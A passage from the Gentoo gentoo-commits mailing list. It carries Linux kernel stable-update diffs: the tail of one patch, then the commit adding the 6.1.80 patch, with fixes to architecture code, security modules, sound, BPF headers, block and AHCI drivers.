++			return -EINVAL;
+ 		if (netif_running(dev))
+ 			return -EBUSY;
+ 
+diff --git a/security/landlock/fs.c b/security/landlock/fs.c
+index 64ed7665455fe..d328965f32f7f 100644
+--- a/security/landlock/fs.c
++++ b/security/landlock/fs.c
+@@ -824,8 +824,8 @@ static int current_check_refer_path(struct dentry *const old_dentry,
+ 	bool allow_parent1, allow_parent2;
+ 	access_mask_t access_request_parent1, access_request_parent2;
+ 	struct path mnt_dir;
+-	layer_mask_t layer_masks_parent1[LANDLOCK_NUM_ACCESS_FS],
+-		layer_masks_parent2[LANDLOCK_NUM_ACCESS_FS];
++	layer_mask_t layer_masks_parent1[LANDLOCK_NUM_ACCESS_FS] = {},
++		     layer_masks_parent2[LANDLOCK_NUM_ACCESS_FS] = {};
+ 
+ 	if (!dom)
+ 		return 0;
+diff --git a/security/tomoyo/common.c b/security/tomoyo/common.c
+index f4cd9b58b2054..a7af085550b2d 100644
+--- a/security/tomoyo/common.c
++++ b/security/tomoyo/common.c
+@@ -2648,13 +2648,14 @@ ssize_t tomoyo_write_control(struct tomoyo_io_buffer *head,
+ {
+ 	int error = buffer_len;
+ 	size_t avail_len = buffer_len;
+-	char *cp0 = head->write_buf;
++	char *cp0;
+ 	int idx;
+ 
+ 	if (!head->write)
+ 		return -EINVAL;
+ 	if (mutex_lock_interruptible(&head->io_sem))
+ 		return -EINTR;
++	cp0 = head->write_buf;
+ 	head->read_user_buf_avail = 0;
+ 	idx = tomoyo_read_lock();
+ 	/* Read a line and dispatch it to the policy handler. */
+diff --git a/sound/core/Makefile b/sound/core/Makefile
+index 2762f03d9b7bc..a7a1590b29526 100644
+--- a/sound/core/Makefile
++++ b/sound/core/Makefile
+@@ -30,7 +30,6 @@ snd-ctl-led-objs  := control_led.o
+ snd-rawmidi-objs  := rawmidi.o
+ snd-timer-objs    := timer.o
+ snd-hrtimer-objs  := hrtimer.o
+-snd-rtctimer-objs := rtctimer.o
+ snd-hwdep-objs    := hwdep.o
+ snd-seq-device-objs := seq_device.o
+ 
+diff --git a/sound/firewire/amdtp-stream.c b/sound/firewire/amdtp-stream.c
+index 9be2260e4ca2d..f8b644cb9157a 100644
+--- a/sound/firewire/amdtp-stream.c
++++ b/sound/firewire/amdtp-stream.c
+@@ -934,7 +934,7 @@ static int generate_device_pkt_descs(struct amdtp_stream *s,
+ 				// to the reason.
+ 				unsigned int safe_cycle = increment_ohci_cycle_count(next_cycle,
+ 								IR_JUMBO_PAYLOAD_MAX_SKIP_CYCLES);
+-				lost = (compare_ohci_cycle_count(safe_cycle, cycle) > 0);
++				lost = (compare_ohci_cycle_count(safe_cycle, cycle) < 0);
+ 			}
+ 			if (lost) {
+ 				dev_err(&s->unit->device, "Detect discontinuity of cycle: %d %d\n",
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 92a656fb53212..75bd7b2fa4ee6 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9662,6 +9662,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8973, "HP EliteBook 860 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8974, "HP EliteBook 840 Aero G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8975, "HP EliteBook x360 840 Aero G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x897d, "HP mt440 Mobile Thin Client U74", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8981, "HP Elite Dragonfly G3", ALC245_FIXUP_CS35L41_SPI_4),
+ 	SND_PCI_QUIRK(0x103c, 0x898e, "HP EliteBook 835 G9", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x103c, 0x898f, "HP EliteBook 835 G9", ALC287_FIXUP_CS35L41_I2C_2),
+@@ -9687,11 +9688,13 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8aa3, "HP ProBook 450 G9 (MB 8AA1)", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8aa8, "HP EliteBook 640 G9 (MB 8AA6)", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8aab, "HP EliteBook 650 G9 (MB 8AA9)", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8ab9, "HP EliteBook 840 G8 (MB 8AB8)", ALC285_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8abb, "HP ZBook Firefly 14 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ad1, "HP EliteBook 840 14 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ad2, "HP EliteBook 860 16 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b0f, "HP Elite mt645 G7 Mobile Thin Client U81", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b2f, "HP 255 15.6 inch G10 Notebook PC", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
++	SND_PCI_QUIRK(0x103c, 0x8b3f, "HP mt440 Mobile Thin Client U91", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b42, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b43, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b44, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+diff --git a/tools/include/uapi/linux/bpf.h b/tools/include/uapi/linux/bpf.h
+index 201dc77ebbd77..d5d2183730b9f 100644
+--- a/tools/include/uapi/linux/bpf.h
++++ b/tools/include/uapi/linux/bpf.h
+@@ -3109,6 +3109,10 @@ union bpf_attr {
+  *		**BPF_FIB_LOOKUP_DIRECT**
+  *			Do a direct table lookup vs full lookup using FIB
+  *			rules.
++ *		**BPF_FIB_LOOKUP_TBID**
++ *			Used with BPF_FIB_LOOKUP_DIRECT.
++ *			Use the routing table ID present in *params*->tbid
++ *			for the fib lookup.
+  *		**BPF_FIB_LOOKUP_OUTPUT**
+  *			Perform lookup from an egress perspective (default is
+  *			ingress).
+@@ -3117,6 +3121,11 @@ union bpf_attr {
+  *			and *params*->smac will not be set as output. A common
+  *			use case is to call **bpf_redirect_neigh**\ () after
+  *			doing **bpf_fib_lookup**\ ().
++ *		**BPF_FIB_LOOKUP_SRC**
++ *			Derive and set source IP addr in *params*->ipv{4,6}_src
++ *			for the nexthop. If the src addr cannot be derived,
++ *			**BPF_FIB_LKUP_RET_NO_SRC_ADDR** is returned. In this
++ *			case, *params*->dmac and *params*->smac are not set either.
+  *
+  *		*ctx* is either **struct xdp_md** for XDP programs or
+  *		**struct sk_buff** tc cls_act programs.
+@@ -6687,6 +6696,8 @@ enum {
+ 	BPF_FIB_LOOKUP_DIRECT  = (1U << 0),
+ 	BPF_FIB_LOOKUP_OUTPUT  = (1U << 1),
+ 	BPF_FIB_LOOKUP_SKIP_NEIGH = (1U << 2),
++	BPF_FIB_LOOKUP_TBID    = (1U << 3),
++	BPF_FIB_LOOKUP_SRC     = (1U << 4),
+ };
+ 
+ enum {
+@@ -6699,6 +6710,7 @@ enum {
+ 	BPF_FIB_LKUP_RET_UNSUPP_LWT,   /* fwd requires encapsulation */
+ 	BPF_FIB_LKUP_RET_NO_NEIGH,     /* no neighbor entry for nh */
+ 	BPF_FIB_LKUP_RET_FRAG_NEEDED,  /* fragmentation required to fwd */
++	BPF_FIB_LKUP_RET_NO_SRC_ADDR,  /* failed to derive IP src addr */
+ };
+ 
+ struct bpf_fib_lookup {
+@@ -6733,6 +6745,9 @@ struct bpf_fib_lookup {
+ 		__u32	rt_metric;
+ 	};
+ 
++	/* input: source address to consider for lookup
++	 * output: source address result from lookup
++	 */
+ 	union {
+ 		__be32		ipv4_src;
+ 		__u32		ipv6_src[4];  /* in6_addr; network order */
+@@ -6747,9 +6762,19 @@ struct bpf_fib_lookup {
+ 		__u32		ipv6_dst[4];  /* in6_addr; network order */
+ 	};
+ 
+-	/* output */
+-	__be16	h_vlan_proto;
+-	__be16	h_vlan_TCI;
++	union {
++		struct {
++			/* output */
++			__be16	h_vlan_proto;
++			__be16	h_vlan_TCI;
++		};
++		/* input: when accompanied with the
++		 * 'BPF_FIB_LOOKUP_DIRECT | BPF_FIB_LOOKUP_TBID` flags, a
++		 * specific routing table to use for the fib lookup.
++		 */
++		__u32	tbid;
++	};
++
+ 	__u8	smac[6];     /* ETH_ALEN */
+ 	__u8	dmac[6];     /* ETH_ALEN */
+ };
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index 2107579e2939d..a20dca9d26d68 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -144,6 +144,11 @@ check_tools()
+ 		exit $ksft_skip
+ 	fi
+ 
++	if ! ss -h | grep -q MPTCP; then
++		echo "SKIP: ss tool does not support MPTCP"
++		exit $ksft_skip
++	fi
++
+ 	# Use the legacy version if available to support old kernel versions
+ 	if iptables-legacy -V &> /dev/null; then
+ 		iptables="iptables-legacy"


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-03-01 13:07 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-03-01 13:07 UTC (permalink / raw
  To: gentoo-commits

commit:     71256151e575b088f3b4e9a57dbdd4e58478012c
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Mar  1 13:07:31 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Mar  1 13:07:31 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=71256151

Linux patch 6.1.80

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1079_linux-6.1.80.patch | 10484 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 10488 insertions(+)

diff --git a/0000_README b/0000_README
index 4d09930e..0bde520b 100644
--- a/0000_README
+++ b/0000_README
@@ -359,6 +359,10 @@ Patch:  1078_linux-6.1.79.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.79
 
+Patch:  1079_linux-6.1.80.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.80
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1079_linux-6.1.80.patch b/1079_linux-6.1.80.patch
new file mode 100644
index 00000000..33a573eb
--- /dev/null
+++ b/1079_linux-6.1.80.patch
@@ -0,0 +1,10484 @@
+diff --git a/Makefile b/Makefile
+index d6bc9f597e8b8..bc4adb561a7cf 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 79
++SUBLEVEL = 80
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/mach-ep93xx/core.c b/arch/arm/mach-ep93xx/core.c
+index 95e731676cea4..961daac653261 100644
+--- a/arch/arm/mach-ep93xx/core.c
++++ b/arch/arm/mach-ep93xx/core.c
+@@ -339,6 +339,7 @@ static struct gpiod_lookup_table ep93xx_i2c_gpiod_table = {
+ 				GPIO_ACTIVE_HIGH | GPIO_OPEN_DRAIN),
+ 		GPIO_LOOKUP_IDX("G", 0, NULL, 1,
+ 				GPIO_ACTIVE_HIGH | GPIO_OPEN_DRAIN),
++		{ }
+ 	},
+ };
+ 
+diff --git a/arch/arm64/boot/dts/rockchip/px30.dtsi b/arch/arm64/boot/dts/rockchip/px30.dtsi
+index bfa3580429d10..61f0186447dad 100644
+--- a/arch/arm64/boot/dts/rockchip/px30.dtsi
++++ b/arch/arm64/boot/dts/rockchip/px30.dtsi
+@@ -607,6 +607,7 @@ spi0: spi@ff1d0000 {
+ 		clock-names = "spiclk", "apb_pclk";
+ 		dmas = <&dmac 12>, <&dmac 13>;
+ 		dma-names = "tx", "rx";
++		num-cs = <2>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&spi0_clk &spi0_csn &spi0_miso &spi0_mosi>;
+ 		#address-cells = <1>;
+@@ -622,6 +623,7 @@ spi1: spi@ff1d8000 {
+ 		clock-names = "spiclk", "apb_pclk";
+ 		dmas = <&dmac 14>, <&dmac 15>;
+ 		dma-names = "tx", "rx";
++		num-cs = <2>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&spi1_clk &spi1_csn0 &spi1_csn1 &spi1_miso &spi1_mosi>;
+ 		#address-cells = <1>;
+diff --git a/arch/arm64/include/asm/fpsimd.h b/arch/arm64/include/asm/fpsimd.h
+index d720b6f7e5f9c..da18413712c04 100644
+--- a/arch/arm64/include/asm/fpsimd.h
++++ b/arch/arm64/include/asm/fpsimd.h
+@@ -343,6 +343,7 @@ extern void sme_alloc(struct task_struct *task, bool flush);
+ extern unsigned int sme_get_vl(void);
+ extern int sme_set_current_vl(unsigned long arg);
+ extern int sme_get_current_vl(void);
++extern void sme_suspend_exit(void);
+ 
+ /*
+  * Return how many bytes of memory are required to store the full SME
+@@ -372,6 +373,7 @@ static inline int sme_max_vl(void) { return 0; }
+ static inline int sme_max_virtualisable_vl(void) { return 0; }
+ static inline int sme_set_current_vl(unsigned long arg) { return -EINVAL; }
+ static inline int sme_get_current_vl(void) { return -EINVAL; }
++static inline void sme_suspend_exit(void) { }
+ 
+ static inline size_t za_state_size(struct task_struct const *task)
+ {
+diff --git a/arch/arm64/kernel/fpsimd.c b/arch/arm64/kernel/fpsimd.c
+index 8c226d79abdfc..59b5a16bab5d6 100644
+--- a/arch/arm64/kernel/fpsimd.c
++++ b/arch/arm64/kernel/fpsimd.c
+@@ -1347,6 +1347,20 @@ void __init sme_setup(void)
+ 		get_sme_default_vl());
+ }
+ 
++void sme_suspend_exit(void)
++{
++	u64 smcr = 0;
++
++	if (!system_supports_sme())
++		return;
++
++	if (system_supports_fa64())
++		smcr |= SMCR_ELx_FA64;
++
++	write_sysreg_s(smcr, SYS_SMCR_EL1);
++	write_sysreg_s(0, SYS_SMPRI_EL1);
++}
++
+ #endif /* CONFIG_ARM64_SME */
+ 
+ static void sve_init_regs(void)
+diff --git a/arch/arm64/kernel/suspend.c b/arch/arm64/kernel/suspend.c
+index 8b02d310838f9..064d996cc55b2 100644
+--- a/arch/arm64/kernel/suspend.c
++++ b/arch/arm64/kernel/suspend.c
+@@ -11,6 +11,7 @@
+ #include <asm/daifflags.h>
+ #include <asm/debug-monitors.h>
+ #include <asm/exec.h>
++#include <asm/fpsimd.h>
+ #include <asm/mte.h>
+ #include <asm/memory.h>
+ #include <asm/mmu_context.h>
+@@ -77,6 +78,8 @@ void notrace __cpu_suspend_exit(void)
+ 	 */
+ 	spectre_v4_enable_mitigation(NULL);
+ 
++	sme_suspend_exit();
++
+ 	/* Restore additional feature-specific configuration */
+ 	ptrauth_suspend_exit();
+ }
+diff --git a/arch/arm64/kvm/vgic/vgic-its.c b/arch/arm64/kvm/vgic/vgic-its.c
+index 3c344e4cd4cad..092327665a6ef 100644
+--- a/arch/arm64/kvm/vgic/vgic-its.c
++++ b/arch/arm64/kvm/vgic/vgic-its.c
+@@ -462,6 +462,9 @@ static int its_sync_lpi_pending_table(struct kvm_vcpu *vcpu)
+ 		}
+ 
+ 		irq = vgic_get_irq(vcpu->kvm, NULL, intids[i]);
++		if (!irq)
++			continue;
++
+ 		raw_spin_lock_irqsave(&irq->irq_lock, flags);
+ 		irq->pending_latch = pendmask & (1U << bit_nr);
+ 		vgic_queue_irq_unlock(vcpu->kvm, irq, flags);
+@@ -1427,6 +1430,8 @@ static int vgic_its_cmd_handle_movall(struct kvm *kvm, struct vgic_its *its,
+ 
+ 	for (i = 0; i < irq_count; i++) {
+ 		irq = vgic_get_irq(kvm, NULL, intids[i]);
++		if (!irq)
++			continue;
+ 
+ 		update_affinity(irq, vcpu2);
+ 
+diff --git a/arch/loongarch/Kconfig b/arch/loongarch/Kconfig
+index e737dc8cd660c..fa3171f563274 100644
+--- a/arch/loongarch/Kconfig
++++ b/arch/loongarch/Kconfig
+@@ -9,6 +9,7 @@ config LOONGARCH
+ 	select ARCH_BINFMT_ELF_STATE
+ 	select ARCH_ENABLE_MEMORY_HOTPLUG
+ 	select ARCH_ENABLE_MEMORY_HOTREMOVE
++	select ARCH_ENABLE_THP_MIGRATION if TRANSPARENT_HUGEPAGE
+ 	select ARCH_HAS_ACPI_TABLE_UPGRADE	if ACPI
+ 	select ARCH_HAS_NON_OVERLAPPING_ADDRESS_SPACE
+ 	select ARCH_HAS_PTE_SPECIAL
+@@ -80,6 +81,7 @@ config LOONGARCH
+ 	select GPIOLIB
+ 	select HAVE_ARCH_AUDITSYSCALL
+ 	select HAVE_ARCH_MMAP_RND_BITS if MMU
++	select HAVE_ARCH_SECCOMP
+ 	select HAVE_ARCH_SECCOMP_FILTER
+ 	select HAVE_ARCH_TRACEHOOK
+ 	select HAVE_ARCH_TRANSPARENT_HUGEPAGE
+@@ -461,23 +463,6 @@ config PHYSICAL_START
+ 	  specified in the "crashkernel=YM@XM" command line boot parameter
+ 	  passed to the panic-ed kernel).
+ 
+-config SECCOMP
+-	bool "Enable seccomp to safely compute untrusted bytecode"
+-	depends on PROC_FS
+-	default y
+-	help
+-	  This kernel feature is useful for number crunching applications
+-	  that may need to compute untrusted bytecode during their
+-	  execution. By using pipes or other transports made available to
+-	  the process as file descriptors supporting the read/write
+-	  syscalls, it's possible to isolate those applications in
+-	  their own address space using seccomp. Once seccomp is
+-	  enabled via /proc/<pid>/seccomp, it cannot be disabled
+-	  and the task is only allowed to execute a few safe syscalls
+-	  defined by each seccomp mode.
+-
+-	  If unsure, say Y. Only embedded should say N here.
+-
+ endmenu
+ 
+ config ARCH_SELECT_MEMORY_MODEL
+@@ -495,10 +480,6 @@ config ARCH_SPARSEMEM_ENABLE
+ 	  or have huge holes in the physical address space for other reasons.
+ 	  See <file:Documentation/mm/numa.rst> for more.
+ 
+-config ARCH_ENABLE_THP_MIGRATION
+-	def_bool y
+-	depends on TRANSPARENT_HUGEPAGE
+-
+ config ARCH_MEMORY_PROBE
+ 	def_bool y
+ 	depends on MEMORY_HOTPLUG
+diff --git a/arch/loongarch/kernel/smp.c b/arch/loongarch/kernel/smp.c
+index e0404df2c952f..18a2b37f4aea3 100644
+--- a/arch/loongarch/kernel/smp.c
++++ b/arch/loongarch/kernel/smp.c
+@@ -297,6 +297,7 @@ void play_dead(void)
+ 		addr = iocsr_read64(LOONGARCH_IOCSR_MBUF0);
+ 	} while (addr == 0);
+ 
++	local_irq_disable();
+ 	init_fn = (void *)TO_CACHE(addr);
+ 	iocsr_write32(0xffffffff, LOONGARCH_IOCSR_IPI_CLEAR);
+ 
+diff --git a/arch/mips/kernel/traps.c b/arch/mips/kernel/traps.c
+index 246c6a6b02614..5b778995d4483 100644
+--- a/arch/mips/kernel/traps.c
++++ b/arch/mips/kernel/traps.c
+@@ -2007,7 +2007,13 @@ unsigned long vi_handlers[64];
+ 
+ void reserve_exception_space(phys_addr_t addr, unsigned long size)
+ {
+-	memblock_reserve(addr, size);
++	/*
++	 * reserve exception space on CPUs other than CPU0
++	 * is too late, since memblock is unavailable when APs
++	 * up
++	 */
++	if (smp_processor_id() == 0)
++		memblock_reserve(addr, size);
+ }
+ 
+ void __init *set_except_vector(int n, void *addr)
+diff --git a/arch/parisc/kernel/processor.c b/arch/parisc/kernel/processor.c
+index 1f6c776d80813..c67883487ecd3 100644
+--- a/arch/parisc/kernel/processor.c
++++ b/arch/parisc/kernel/processor.c
+@@ -171,7 +171,6 @@ static int __init processor_probe(struct parisc_device *dev)
+ 	p->cpu_num = cpu_info.cpu_num;
+ 	p->cpu_loc = cpu_info.cpu_loc;
+ 
+-	set_cpu_possible(cpuid, true);
+ 	store_cpu_topology(cpuid);
+ 
+ #ifdef CONFIG_SMP
+@@ -466,13 +465,6 @@ static struct parisc_driver cpu_driver __refdata = {
+  */
+ void __init processor_init(void)
+ {
+-	unsigned int cpu;
+-
+ 	reset_cpu_topology();
+-
+-	/* reset possible mask. We will mark those which are possible. */
+-	for_each_possible_cpu(cpu)
+-		set_cpu_possible(cpu, false);
+-
+ 	register_parisc_driver(&cpu_driver);
+ }
+diff --git a/arch/s390/pci/pci.c b/arch/s390/pci/pci.c
+index 2c99f9552b2f5..394c69fda399e 100644
+--- a/arch/s390/pci/pci.c
++++ b/arch/s390/pci/pci.c
+@@ -241,7 +241,7 @@ resource_size_t pcibios_align_resource(void *data, const struct resource *res,
+ /* combine single writes by using store-block insn */
+ void __iowrite64_copy(void __iomem *to, const void *from, size_t count)
+ {
+-       zpci_memcpy_toio(to, from, count);
++	zpci_memcpy_toio(to, from, count * 8);
+ }
+ 
+ static void __iomem *__ioremap(phys_addr_t addr, size_t size, pgprot_t prot)
+diff --git a/arch/x86/include/asm/nospec-branch.h b/arch/x86/include/asm/nospec-branch.h
+index 2f123d4fb85b5..d3706de91a934 100644
+--- a/arch/x86/include/asm/nospec-branch.h
++++ b/arch/x86/include/asm/nospec-branch.h
+@@ -222,6 +222,8 @@ extern void srso_alias_untrain_ret(void);
+ extern void entry_untrain_ret(void);
+ extern void entry_ibpb(void);
+ 
++extern void (*x86_return_thunk)(void);
++
+ #ifdef CONFIG_RETPOLINE
+ 
+ #define GEN(reg) \
+diff --git a/arch/x86/kernel/alternative.c b/arch/x86/kernel/alternative.c
+index 6b8c93989aa31..69f85e2746119 100644
+--- a/arch/x86/kernel/alternative.c
++++ b/arch/x86/kernel/alternative.c
+@@ -536,6 +536,7 @@ void __init_or_module noinline apply_retpolines(s32 *start, s32 *end)
+ }
+ 
+ #ifdef CONFIG_RETHUNK
++
+ /*
+  * Rewrite the compiler generated return thunk tail-calls.
+  *
+@@ -551,14 +552,18 @@ static int patch_return(void *addr, struct insn *insn, u8 *bytes)
+ {
+ 	int i = 0;
+ 
+-	if (cpu_feature_enabled(X86_FEATURE_RETHUNK))
+-		return -1;
++	if (cpu_feature_enabled(X86_FEATURE_RETHUNK)) {
++		if (x86_return_thunk == __x86_return_thunk)
++			return -1;
+ 
+-	bytes[i++] = RET_INSN_OPCODE;
++		i = JMP32_INSN_SIZE;
++		__text_gen_insn(bytes, JMP32_INSN_OPCODE, addr, x86_return_thunk, i);
++	} else {
++		bytes[i++] = RET_INSN_OPCODE;
++	}
+ 
+ 	for (; i < insn->length;)
+ 		bytes[i++] = INT3_INSN_OPCODE;
+-
+ 	return i;
+ }
+ 
+diff --git a/arch/x86/kernel/ftrace.c b/arch/x86/kernel/ftrace.c
+index e07234ec7e237..ec51ce713dea4 100644
+--- a/arch/x86/kernel/ftrace.c
++++ b/arch/x86/kernel/ftrace.c
+@@ -361,7 +361,7 @@ create_trampoline(struct ftrace_ops *ops, unsigned int *tramp_size)
+ 
+ 	ip = trampoline + size;
+ 	if (cpu_feature_enabled(X86_FEATURE_RETHUNK))
+-		__text_gen_insn(ip, JMP32_INSN_OPCODE, ip, &__x86_return_thunk, JMP32_INSN_SIZE);
++		__text_gen_insn(ip, JMP32_INSN_OPCODE, ip, x86_return_thunk, JMP32_INSN_SIZE);
+ 	else
+ 		memcpy(ip, retq, sizeof(retq));
+ 
+diff --git a/arch/x86/kernel/static_call.c b/arch/x86/kernel/static_call.c
+index 3fbb491688275..b32134b093ec8 100644
+--- a/arch/x86/kernel/static_call.c
++++ b/arch/x86/kernel/static_call.c
+@@ -80,7 +80,7 @@ static void __ref __static_call_transform(void *insn, enum insn_type type,
+ 
+ 	case RET:
+ 		if (cpu_feature_enabled(X86_FEATURE_RETHUNK))
+-			code = text_gen_insn(JMP32_INSN_OPCODE, insn, &__x86_return_thunk);
++			code = text_gen_insn(JMP32_INSN_OPCODE, insn, x86_return_thunk);
+ 		else
+ 			code = &retinsn;
+ 		break;
+diff --git a/arch/x86/mm/numa.c b/arch/x86/mm/numa.c
+index aa39d678fe81d..dae5c952735c7 100644
+--- a/arch/x86/mm/numa.c
++++ b/arch/x86/mm/numa.c
+@@ -961,7 +961,7 @@ static int __init cmp_memblk(const void *a, const void *b)
+ 	const struct numa_memblk *ma = *(const struct numa_memblk **)a;
+ 	const struct numa_memblk *mb = *(const struct numa_memblk **)b;
+ 
+-	return ma->start - mb->start;
++	return (ma->start > mb->start) - (ma->start < mb->start);
+ }
+ 
+ static struct numa_memblk *numa_memblk_list[NR_NODE_MEMBLKS] __initdata;
+@@ -971,14 +971,12 @@ static struct numa_memblk *numa_memblk_list[NR_NODE_MEMBLKS] __initdata;
+  * @start: address to begin fill
+  * @end: address to end fill
+  *
+- * Find and extend numa_meminfo memblks to cover the @start-@end
+- * physical address range, such that the first memblk includes
+- * @start, the last memblk includes @end, and any gaps in between
+- * are filled.
++ * Find and extend numa_meminfo memblks to cover the physical
++ * address range @start-@end
+  *
+  * RETURNS:
+  * 0		  : Success
+- * NUMA_NO_MEMBLK : No memblk exists in @start-@end range
++ * NUMA_NO_MEMBLK : No memblks exist in address range @start-@end
+  */
+ 
+ int __init numa_fill_memblks(u64 start, u64 end)
+@@ -990,17 +988,14 @@ int __init numa_fill_memblks(u64 start, u64 end)
+ 
+ 	/*
+ 	 * Create a list of pointers to numa_meminfo memblks that
+-	 * overlap start, end. Exclude (start == bi->end) since
+-	 * end addresses in both a CFMWS range and a memblk range
+-	 * are exclusive.
+-	 *
+-	 * This list of pointers is used to make in-place changes
+-	 * that fill out the numa_meminfo memblks.
++	 * overlap start, end. The list is used to make in-place
++	 * changes that fill out the numa_meminfo memblks.
+ 	 */
+ 	for (int i = 0; i < mi->nr_blks; i++) {
+ 		struct numa_memblk *bi = &mi->blk[i];
+ 
+-		if (start < bi->end && end >= bi->start) {
++		if (memblock_addrs_overlap(start, end - start, bi->start,
++					   bi->end - bi->start)) {
+ 			blk[count] = &mi->blk[i];
+ 			count++;
+ 		}
+diff --git a/arch/x86/net/bpf_jit_comp.c b/arch/x86/net/bpf_jit_comp.c
+index b69aee6245e4a..7913440c0fd46 100644
+--- a/arch/x86/net/bpf_jit_comp.c
++++ b/arch/x86/net/bpf_jit_comp.c
+@@ -432,7 +432,7 @@ static void emit_return(u8 **pprog, u8 *ip)
+ 	u8 *prog = *pprog;
+ 
+ 	if (cpu_feature_enabled(X86_FEATURE_RETHUNK)) {
+-		emit_jump(&prog, &__x86_return_thunk, ip);
++		emit_jump(&prog, x86_return_thunk, ip);
+ 	} else {
+ 		EMIT1(0xC3);		/* ret */
+ 		if (IS_ENABLED(CONFIG_SLS))
+diff --git a/block/blk-map.c b/block/blk-map.c
+index 66da9e2b19abf..b337ae347bfa3 100644
+--- a/block/blk-map.c
++++ b/block/blk-map.c
+@@ -203,12 +203,19 @@ static int bio_copy_user_iov(struct request *rq, struct rq_map_data *map_data,
+ 	/*
+ 	 * success
+ 	 */
+-	if ((iov_iter_rw(iter) == WRITE &&
+-	     (!map_data || !map_data->null_mapped)) ||
+-	    (map_data && map_data->from_user)) {
++	if (iov_iter_rw(iter) == WRITE &&
++	     (!map_data || !map_data->null_mapped)) {
+ 		ret = bio_copy_from_iter(bio, iter);
+ 		if (ret)
+ 			goto cleanup;
++	} else if (map_data && map_data->from_user) {
++		struct iov_iter iter2 = *iter;
++
++		/* This is the copy-in part of SG_DXFER_TO_FROM_DEV. */
++		iter2.data_source = ITER_SOURCE;
++		ret = bio_copy_from_iter(bio, &iter2);
++		if (ret)
++			goto cleanup;
+ 	} else {
+ 		if (bmd->is_our_pages)
+ 			zero_fill_bio(bio);
+diff --git a/drivers/ata/ahci.c b/drivers/ata/ahci.c
+index 805645efb3ccf..1790a2ecb9fac 100644
+--- a/drivers/ata/ahci.c
++++ b/drivers/ata/ahci.c
+@@ -49,6 +49,7 @@ enum {
+ enum board_ids {
+ 	/* board IDs by feature in alphabetical order */
+ 	board_ahci,
++	board_ahci_43bit_dma,
+ 	board_ahci_ign_iferr,
+ 	board_ahci_low_power,
+ 	board_ahci_no_debounce_delay,
+@@ -129,6 +130,13 @@ static const struct ata_port_info ahci_port_info[] = {
+ 		.udma_mask	= ATA_UDMA6,
+ 		.port_ops	= &ahci_ops,
+ 	},
++	[board_ahci_43bit_dma] = {
++		AHCI_HFLAGS	(AHCI_HFLAG_43BIT_ONLY),
++		.flags		= AHCI_FLAG_COMMON,
++		.pio_mask	= ATA_PIO4,
++		.udma_mask	= ATA_UDMA6,
++		.port_ops	= &ahci_ops,
++	},
+ 	[board_ahci_ign_iferr] = {
+ 		AHCI_HFLAGS	(AHCI_HFLAG_IGN_IRQ_IF_ERR),
+ 		.flags		= AHCI_FLAG_COMMON,
+@@ -597,14 +605,19 @@ static const struct pci_device_id ahci_pci_tbl[] = {
+ 	{ PCI_VDEVICE(PROMISE, 0x3f20), board_ahci },	/* PDC42819 */
